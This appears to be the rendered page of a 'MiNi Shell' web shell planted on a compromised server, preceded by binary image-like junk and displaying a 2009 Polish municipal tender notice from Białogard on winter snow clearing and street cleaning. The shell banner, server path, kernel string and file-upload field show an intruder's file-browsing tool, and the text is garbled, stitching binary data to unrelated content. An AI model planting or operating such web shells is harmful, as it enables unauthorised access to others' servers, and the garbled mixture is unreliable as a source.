JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091012/175659-N-2009.html

<p class="kh_header"><b>Białogard: usługi związane z prowadzeniem akcji zimowej na ulicach i chodnikach miasta Białogard w sezonie 2009-2010</b><br>
<b>Numer ogłoszenia: 175659 - 2009; data zamieszczenia: 12.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białogard - Urząd Miasta Białogardu , ul. 1-go Maja 18, 78-200 Białogard, woj. zachodniopomorskie, tel. 094 3122310, faks 094 3122919.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialogard.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi związane z prowadzeniem akcji zimowej na ulicach i chodnikach miasta Białogard w sezonie 2009-2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia są usługi związane z prowadzeniem akcji zimowej na ulicach i chodnikach miasta Białogard w sezonie 2009-1010. 
2) Dopuszcza się składanie ofert częściowych z których pierwsza cześć zamówienia obejmuje prowadzenie akcji zimowej na chodnikach miasta Białogard, natomiast druga część prowadzenie akcji zimowej na ulicach miasta Białogard.
3) Szczegółowy zakres zamówienia obejmuje:
A) cześć 1 - chodniki (CPV: 90620000-9, 90630000-2)
a) ikwidacja gołoledzi oraz odśnieżanie chodników i parkingów,
b) wywóz zwałów śniegu nagromadzonego w trakcie akcji,
c) wywóz nagromadzonych materiałów uszorstniających (piasku pozostałego po posypywani chodników i parkingów) po okresie trwania akcji zimowej,
d) w przypadku braku opadów śnieżnych bieżące utrzymanie czystości na terenie miasta obejmujące w szczególności (CPV: 90610000-6):
- zamiatanie ulic wzdłuż krawężników na szerokości 75 cm w stronę osi jezdni (w razie wystąpienia konieczności usuwanie zanieczyszczeń z całej szerokości jezdni),
- zamiatanie chodników i parkingów oraz usuwanie odpadów z terenów zieleni miejskiej leżącej w pasach drogowych,
- opróżnianie, dezynfekcja (raz w miesiącu) i konserwacja koszy na śmieci,
- wywóz zwłok zwierzęcych z obszaru miasta Białogard.
      
Wykaz chodników i parkingów podlegających odśnieżaniu zamieszczono w załączniku A, natomiast terenów podlegających oczyszczaniu (w przypadku braku opadów śnieżnych) zamieszczono w załączniku B

B) część 2 - ulice (CPV: 90620000-9, 90630000-2)
a) likwidacja gołoledzi i odśnieżanie ulic,
b) odśnieżanie i posypywanie skrzyżowań i przejść dla pieszych (skrzyżowania powinny być odśnieżane zarówno przy krawędzi ulicy jak i na środku skrzyżowania),
c) wywóz zwałów śniegu nagromadzonego w trakcie akcji.

Wykaz ulic podlegających odśnieżaniu zamieszczono w załączniku C.

4) Odśnieżanie ulic i chodników powinno odbywać się w taki sposób aby przejścia dla pieszych nie były zasypane zaspami śnieżnymi, umożliwiając swobodne przechodzenie pieszych przez ulice.
5) Wymagany ilościowy skład mieszanki solno-piaskowej musi zawierać 25% soli, natomiast zużycie mieszanki w ilości 100 g na 1 m 2.
6) Sprzątanie terenów ujętych w załączniku B odbywać się będzie tylko w przypadku braku śniegu na ulicach i chodnikach oraz po uprzednim ustaleniu czynności z Zamawiającym.
7) W ofercie dotyczącej odśnieżania chodników i parkingów należy uwzględnić wygrabienie liści wiosenne i jesienne oraz sprzątanie odchodów zwierzęcych z trawników leżących w pasie drogowym wraz z zebraniem i wywozem na kompostownik lub wysypisko śmieci. 
8) Zwłoki zwierzęce należy wywozić do Zakładu Struga S.A. Punkt Pozyskiwania i Przeładunku Surowców Utylizacyjnych w Karlinie, ul. Kołobrzeska 13, okazując Zamawiającemu potwierdzenie ich utylizacji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1) O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
a) nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 i art. 22 ust. 1 ustawy z dnia 29  stycznia  2004 r. Prawo  zamówień  publicznych   (Dz.U.z 2007 r.  Nr 223,  poz. 1655 ze  zm.);
b) nie zalegają z opłacaniem podatków, opłat oraz składek na ubezpieczenie społeczne,
c) wykażą że posiadają odpowiedni sprzęt do wykonania niniejszych zamówień (wymagana forma własności sprzętu: własność lub dzierżawa), tj.: 
- w przypadku składania oferty dotyczącej odśnieżania ulic: min. 3 ciągniki lub inne pojazdy z przyczepami, min. 3 pługi, min. 3 piaskarki;
- w przypadku składania oferty dotyczącej odśnieżania chodników: min. 2 ciągniki lub inne pojazdy z przyczepami, min. 2 pługi, min. 2 piaskarki, min 6 wózków na piasek, zmiotki i odpady, min. 6 łopat do śniegu, pozostały sprzęt typu miotły, skuwaki do lodu, łopaty itp.
- w przypadku składania ofert przez jednego Wykonawcę na dwie części zamówienia (odśnieżanie chodników i ulic) należy posiadać wymagany sprzęt w ilości łącznej tj.: 5 ciągników lub innych pojazdów z przyczepami, min. 5 pługów, min. 5 piaskarek, min 6 wózków na piasek, zmiotki i odpady, min. 6 łopat do śniegu, pozostały sprzęt typu miotły, skuwaki do lodu, łopaty itp.
d) zatrudniają co najmniej 7 pracowników (na umowę o pracę, zlecenie lub o dzieło) w przypadku odśnieżania chodników i 5 pracowników w przypadku odśnieżania ulic. W przypadku składania ofert przez jednego Wykonawcę na dwie części zamówienia (odśnieżanie chodników i ulic) należy zatrudniać co najmniej 12 pracowników.
e) spełniają wymagania określone w niniejszej Specyfikacji Istotnych Warunków Zamówienia (SWIZ).
f) wykażą się doświadczeniem w wykonaniu porównywalnych usług,
g) znajdują się w sytuacji finansowej zapewniającej wykonanie zamówienia, 
h) wykażą się polisą o wartości nie mniejszej niż 50 tys. zł lub innym dokumentem ubezpieczenia potwierdzającym, że Wykonawca i ewentualny podwykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej (jeżeli ubezpieczenie nie obejmuje całego okresu objętego zamówieniem Wykonawca zobowiązuje się dostarczyć do Zamawiającego najpóźniej 7 dni przed wygaśnięciem poprzedniej polisy, kserokopii poświadczonej za zgodność z oryginałem nowej polisy ubezpieczeniowej przedłużającej okres ubezpieczenia z zachowaniem ciągłości ubezpieczenia),
i) gwarantują dyspozycyjność w trakcie wykonywania przedmiotu zamówienia, terminowość oraz jakość wykonania usługi,
j) dysponują łącznością (telefon, telefon komórkowy, fax) o każdej porze dnia i nocy,
k) posiadają zezwolenie wydane przez Burmistrza Miasta Białogard na prowadzenie działalności w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości ważne na czas trwania zamówienia lub umowę z odbiorcą posiadającym takie zezwolenie (w przypadku składania oferty dot. odśnieżania chodników).
2 Ocena spełnienia  warunków  udziału w  postępowaniu zostanie dokonana  wg  formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez  Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń   musi   wynikać   jednoznacznie, iż  Wykonawca spełnia wyżej wymienione warunki.
3 Zamawiający na podstawie art. 26 ust. 3 ustawy  Prawo zamówień  publicznych ( Dz. U.  z  2007 r.  Nr 223,  poz. 1655 ze zm.) wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów  potwierdzających  spełnienie warunków udziału w  postępowaniu, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca zobowiązany jest wypełnić formularz ofertowy według wzoru stanowiącego załącznik nr 1a lub/i 1b do SIWZ oraz załączyć następujące dokumenty, które stanowić będą załączniki do oferty wg następującej kolejności:
1) świadczenie, że wykonawca zgodnie z art. 24 ust.1 i ust.2 oraz art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień  publicznych  ( Dz.U. z 2007 r. Nr 223, poz.1655 ze zm.)  nie  podlega  wykluczeniu z postępowania o udzielenie zamówienia publicznego - druk do wypełnienia - załącznik Nr 2 do SIWZ,
2) ykaz wykonanych prac o podobnym charakterze w ostatnich 3 latach (jeżeli okres działalności jest krótszy - w tym okresie) odpowiadających swoim rodzajem przedmiotowi zamówienia, z podaniem ich wartości, dat wykonania i odbiorców - minimum 2 prace o wartości około 100 tys. zł każda (druk do wypełnienia) - załącznik nr 3 do SIWZ,
3) wykaz pracowników min. 7 w przypadku odśnieżania chodników i min. 5 pracowników w przypadku odśnieżania ulic - załącznik nr 4 do SIWZ,
4) wyposażenie techniczne (wymagana forma własności sprzętu: własność lub dzierżawa), w przypadku składania oferty dotyczącej odśnieżania ulic: min. 3 ciągniki lub inne pojazdy z przyczepami, min. 3 pługi, min. 3 piaskarki; w przypadku składania oferty dotyczącej odśnieżania chodników: min. 2 ciągniki lub inne pojazdy z przyczepami, min. 2 pługi, min. 2 piaskarki, min 6 wózków na piasek, zmiotki i odpady, min. 6 łopat do śniegu, pozostały sprzęt typu miotły, skuwaki do lodu, łopaty itp. - załącznik Nr 5 do SIWZ,
5) aktualny odpis z właściwego rejestru handlowego lub zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione z datą nie wcześniejszą niż 6 miesięcy przed upływem terminu składania ofert - załącznik Nr 5 do SIWZ,
6) zaświadczenie z właściwego Urzędu Skarbowego potwierdzające, że oferent nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego. Zaświadczenie wystawione z datą nie wcześniejszą niż 3 miesiące przed upływem terminu składania ofert - załącznik Nr 6 do SIWZ,
7) zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzających, że oferent nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego. Zaświadczenie wystawione z datą nie wcześniejszą niż 3 miesiące przed upływem terminu składania ofert - załącznik Nr 7 do SIWZ,
8) polisa ubezpieczeniowa o wartości nie mniejszej niż 50 tys. zł lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, ważną na czas realizacji zamówienia (jeżeli ubezpieczenie nie obejmuje całego okresu objętego zamówieniem Wykonawca zobowiązuje się dostarczyć do Zamawiającego najpóźniej 7 dni przed wygaśnięciem poprzedniej polisy, kserokopii poświadczonej za zgodność z oryginałem nowej polisy ubezpieczeniowej przedłużającej okres ubezpieczenia z zachowaniem ciągłości ubezpieczenia)- załącznik Nr 8 do SIWZ.

UWAGA! Ponieważ każda część zamówienia traktowana jest jako oddzielne postępowanie przetargowe, każdy Wykonawca w przypadku składania dwóch ofert na dwie części zadania musi załączyć wszystkie załączniki do każdej oferty oraz złożyć je w dwóch oddzielnych kopertach..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.bialogard.info w dziale zamówienia publiczne.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Białogard, ul. 1 Maja 18, pok. 216 w godz. 07:00-15:00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.10.2009 godzina 09:00, miejsce: Urząd Miasta Białogard, ul. 1 Maja 18, pok. 224 (sekretaiat) w godz. 07:00-15:00.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> usługi związane z prowadzeniem akcji zimowej na chodnikach miasta Białogard w sezonie 2009-2010.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A) cześć 1 - chodniki
a)likwidacja gołoledzi oraz odśnieżanie chodników i parkingów,
b)wywóz zwałów śniegu nagromadzonego w trakcie akcji,
c)wywóz nagromadzonych materiałów uszorstniających (piasku pozostałego po posypywani chodników i parkingów) po okresie trwania akcji zimowej,
d)w przypadku braku opadów śnieżnych bieżące utrzymanie czystości na terenie miasta obejmujące w szczególności:
- zamiatanie ulic wzdłuż krawężników na szerokości 75 cm w stronę osi jezdni (w razie wystąpienia konieczności usuwanie zanieczyszczeń z całej szerokości jezdni),
- zamiatanie chodników i parkingów oraz usuwanie odpadów z terenów zieleni miejskiej leżącej w pasach drogowych,
- opróżnianie, dezynfekcja (raz w miesiącu) i konserwacja koszy na śmieci,
- wywóz zwłok zwierzęcych z obszaru miasta Białogard.
      
Wykaz chodników i parkingów podlegających odśnieżaniu zamieszczono w załączniku A, natomiast terenów podlegających oczyszczaniu (w przypadku braku opadów śnieżnych) zamieszczono w załączniku B.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> usługi związane z prowadzeniem akcji zimowej na ulicach miasta Białogard w sezonie 2009-2010.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> B) część 2 - ulice 
a) likwidacja gołoledzi i odśnieżanie ulic,
b)odśnieżanie i posypywanie skrzyżowań i przejść dla pieszych (skrzyżowania powinny być odśnieżane zarówno przy krawędzi ulicy jak i na środku skrzyżowania),
c) wywóz zwałów śniegu nagromadzonego w trakcie akcji.

Wykaz ulic podlegających odśnieżaniu zamieszczono w załączniku C..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com